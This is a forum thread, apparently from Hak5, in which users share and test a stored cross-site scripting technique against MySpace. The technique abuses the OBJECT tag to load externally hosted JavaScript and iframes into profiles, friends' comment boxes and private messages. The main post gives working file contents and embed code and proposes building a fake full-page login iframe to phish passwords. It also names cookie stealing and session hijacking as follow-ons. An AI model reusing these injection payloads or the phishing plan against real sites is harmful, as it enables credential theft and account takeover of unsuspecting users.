Myspace

[digip]

About a week or so ago I was playing with MySpace widgets. One of the things I noticed is you can bypass the confirmation page for adding widgets to your profile. Well, I thought, this is bad,because you can probably add these widgets to anyones pages. That wasn't the case, as it turned out to be based on your current logged in session. While working on this with another forum member, I noticed some code he had used to try an insert some javascript. It failed to insert the javascript, but lead me to my next attempts to insert scripts and iframes into my profile. Needless to say, I was able to insert both Javascript and I-frames into my profile. - Credit to DingleBerries for the inspiration and help to this hack.

Disclaimer: This is just for educational purposes. How you use it is up to you, but understand that neither myself or Hak5 is responsible in how you use this information!

Ok. Few things are needed for this to work.

1. A MySpace account.

2. Your own website to store the scripts and files.

How this works is, you add some javascript to a .js file on your site. Then you create a page that calls the .js file. Once you create both the js file and the page, its time to embed that into a persons profile. You can do this on your own page, or just by adding it to a comment box on a friends page.

The flaw relied on how MySpace handles the OBJECT tag. MySpace looks at the OBJECT tag as if it were an adobe Flash file. So anything you add in an OBJECT tag gets recreated on the server side as a FLASH Object structure. The problem is OBJECT can also refer to HTML data and other structures.

Here is an example of some code you can test on your own MySpace page.

Create a file called alert.js and add the following code:

alert ("Welcome to MySpace. If you can see this, it's because MySpace is vulnerable to XSS attacks.");

Now create a file called alert.html:

<script type="text/javascript" src="http://www.yoursite.com/alert.js"></script>

Now that you have created the script and the page that calls the script, you can embed it into the page.

In your profile, add the following code:

<object data="http://www.yoursite.com/alert.html" width="0" height="0"></object>

Save and view your profile and you should now get a Javascript Alert box with our message "Welcome to MySpace. If you can see this, it's because MySpace is vulnerable to XSS attacks."

If you go back and edit your profile, you will see that MySpace has changed your OBJECT tag to look like a FLASH document. But it still loads anything you put into the DATA= field. This is what it looks like after MySpace chages the code you posted above:

<object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="0" width="0" data="http://www.yoursite.com/alert.html">
  <param name="allowScriptAccess" value="never" />
  <param name="allowNetworking" value="internal" />
  <param name="movie" value="http://www.yoursite.com/alert.html" />
</object>

Now lets say you wanted to load an I-frame from another site. Change your alert.js file to the following code and you can now insert an iframe from any site of your choosing:

document.write('<iframe src="http://www.yoursite.com/somepage.html" name="MySpaceFrame" width="100"  height="100" frameborder="0" marginwidth="0" marginheight="0">Must Be Able TO View I-Frames!</iframe>');

With some handy CSS wrapped around the object or within your .js file, you can make it so the i-frame is the entire width and height of the page. You could then go further and mimic the home page and make a fake login site to phish for MySpace logins and passwords. The possibilities are up to you since you can pretty much insert any code into the page at this point. XHTML requests(although I haven't tested any Ajax yet) are probably possible, Cookie stealing, session hijacking, and a number of other flaws are also most likely possible with this vulnerability. And since MySpace uses server side scripting through Cold Fusion, anyone savvy with IIS scripting and Cold Fusion might even be able to take this a step further than just controlling some ones profile.

[DingleBerries]

A multi million dollar business, such as myspace, should have much stricter standards. If companies like this are allowed to half ass code then it really doenst set a good example for others. I understand they are working with vast amounts of data and extremely complex code, but it is the principal of the matter. I still prefer plain text sites.

[digip]

One of the things i haven't tried(Mainly because I don't have accounts) is using this method on Facebook or Linkedin. I imagine any site that allows (HTML + OBJECT) comments could be vulnerable to this sort of thing.

One way this can be blocked from people adding it to your comments is changing your preferences under your account settings.

http://profileedit.myspace.com/index.cfm?f...s.miscellaneous

By unchecking the boxes for allowing HTML in comment fields, people will not be able to post images, videos, or any html tags to your page. This is a good thing, as it makes your page safer! I know, you all love those little glitter graphics and "showing some love" on your comment pages, but what you are doing is opening up your page to intruders who might use this against you. Say for instance your friend or family members account was hacked and someone posted some comments as them. They could essentially take over your entire page, redirecting visitors or capturing your every click and try to serve you with malware, spyware or the like. What that means is anyone viewing a friends comment with the embedded code could be put at risk.

Myspace has a feature where you can send messages to any profile, sort of like email, and you don't have to be friend with anyone to send them a message. You just need to have a MySpace account to send them a message. Add this exploit to the message with an iframe mimicking the login page and you could potentially phish their account.

[H@L0_F00]

Nice find digip!

[Steve8x]

Thats awsome! I didn't know you could do that!! ;) lol it's been like this for a while now, so they haven't exactly figured it out yet! I wonder how long it will take them to patch it...

Well looks like some javascript fun until they do! :) Nice job

[Steve8x]

Strangely I can't seem to get the desired effect on my myspace page...

I also tried:

alert.js:

function HackedUpSpace()
{
    alert("Welcome to my myspace page!");
}

alert.html

<html>
<script type="text/javascript" src="http://popeax.com/alert.js"></script>

<body onload="HackedUpSpace();" />

</html>

still no avail! Can someone else test it and confirm its working? Maybe I'm just doing something wrong?

[ne3jedi]

Strangely I can't seem to get the desired effect on my myspace page...

I also tried:

alert.js:

function HackedUpSpace()
{
    alert("Welcome to my myspace page!");
}

alert.html

<html>
<script type="text/javascript" src="http://popeax.com/alert.js"></script>

<body onload="HackedUpSpace();" />

</html>

still no avail! Can someone else test it and confirm its working? Maybe I'm just doing something wrong?

I also tried and no cigar....

Patched that quick??

[DingleBerries]

Be sure that you are linking to an external site that contains the .js and that

allowScriptAccess="never" allowNetworking="internal"

is set to

allowScriptAccess="always" allowNetworking="external"

...i think thats what i had, im a little drunk atm so ill have to get back to you on that.

[PLuNK]

Pretty amazing, This will be fixed soon though,

But you have a great chance to "have some fun". (In a legal way.. 8-) )

[digip]

edit: anyway, just go here to see a demonstration: http://blog.myspace.com/index.cfm?fuseacti...logID=445918711

I posted it on my music page. This won't be up more than today, so take a look and let me know what you see. Make sure you are not running noscript in FF or any javascript turned off. You should see the alert message I posted above in the first thread.

[DingleBerries]

Firefox 3.0.3 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 (Linux Mint)

No popup but i did get the object tags(i could see them with adblock)

[digip]

Im wondering if this is more a flaw in combination with Myspace and Opera together, as I can not get it to work under Internet Explorer, but works every time in Opera. Either way, Myspace should not be able to load the data from another site, even if it only seems to be working in Opera, I may have to modify it to work in other browsers for now.

Here is a screen grab of my javascript alert window:

If this is isolated to Opera, then its kinda of a double wammy, as its a problem both for the Opera browser and MySpace.

I think I may be patched against this in Interet Explorer but I don't have an older version of Intenret Explorer to test it on. I don't have FireFox to installed either, so I can't vouch for wether or not its going to work in FF, but from the sound of it so far, it only seems to be effecting the Opera browser X(

I can however get the flaw to work in IE when viewed from a page that does not rewrite the OBJECT code the way MySpace does. What I mean by that is, if you view the code in a page as

<object data="http://www.yoursite.com/alert.html" width="0" height="0"></object>

Then it works in both Opera and Internet Explorer.

and when written like

<object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="0" width="0" data="http://www.yoursite.com/alert.html">
  <param name="allowScriptAccess" value="never" />
  <param name="allowNetworking" value="internal" />
  <param name="movie" value="http://www.yoursite.com/alert.html" />
</object>

It only seems to execute in Opera.

[digip]

Well, just tried it on several XP machines, all running SP3 and the latest patches(Which all have Opera installed on them as well) and it works on them all using Opera, but sadly does not work in Internet Explorer on any of them. Not sure why, but I guess the bug is a combination of Myspace and Opera flaws together.

Anyone else here with Opera care to view my blog post to see if you get the alert popup? I'd really like some feedback from Opera users on this as well as any other browsers aside from FF and IE. So if you are using Safari, Konqueror, Gnome, etc, let me know if its working or not working in them.

[DingleBerries]

I will start my mad XSS skills up in a little bit and get one to work in FF. Have you tried allowing script access?

[digip]

I will start my mad XSS skills up in a little bit and get one to work in FF. Have you tried allowing script access?

Yeah. MySpace breaks the code for everythign except Opera. Opera is so good that it loads stuff it probably shouldn't. lol. Im checking with http://browsershots.org/http://blog.myspac...logID=445918711 to see if I can catch any screen grabs of it in action on another browser. So far nothing. Looks like its just localized to Opera and Myspace unless you can use the original OBJECT code some how. As soon as MySpace add the param name stuff it breaks it in IE and FF so I don't understand why Opera is loading it.

Only Opera seems to show the flaw: http://browsershots.org/png/original/45/45...b694b46db27.png :(

Definately not a windows only related bug though, as it does load the XSS flaw in Ubuntu under Opera:

[will-wtf]

Opera mini fell victim to it!

[slipstream666]

right on every1! I am going to be busy for a bit!

[digip]

It still works on Opera but not in IE or FF.

[KD6W]

Meanwhile - (6 years later)

Why is a "myspace popup" video insert just start showing up in the corner of certain web pages I visit with Chrome, or is it just me?

I searched the web and see others have seen this for several months now and mine only just started and then I remembered.

I just changed my virus scanner. Without going into deep details, I "removed" one and launched another and this shit showed up...

[Mr-Protocol]

1) why are you using MySpace?

2) why would you dig up a 6 year old thread :|

I recommend this: http://www.f-secure.com/en/web/home_us/online-scanner or others similar.